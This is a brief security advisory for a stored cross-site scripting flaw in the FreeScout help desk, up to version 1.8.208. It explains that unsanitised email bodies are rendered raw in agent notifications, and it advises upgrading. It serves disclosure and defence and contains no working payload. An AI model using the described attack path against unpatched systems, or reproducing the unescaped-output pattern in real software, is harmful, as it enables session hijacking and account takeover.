CVE-2026-32754

Name of the Vulnerable Software and Affected Versions FreeScout versions 1.8.208 and below

Description FreeScout, a help desk and shared inbox built with PHP’s Laravel framework, is affected by a Stored Cross-Site Scripting (XSS) issue. Incoming email bodies are stored in the database without proper sanitization and are then rendered without escaping in outgoing email notifications using Blade’s raw output syntax {!! $thread->body !!}. This allows an unauthenticated attacker to inject malicious HTML or JavaScript code by simply sending an email. When opened by any subscribed agent or administrator, the injected code can execute, potentially leading to phishing, tracking, session hijacking, credential theft, or account takeover affecting all recipients.

Recommendations Update FreeScout to version 1.8.209 or later.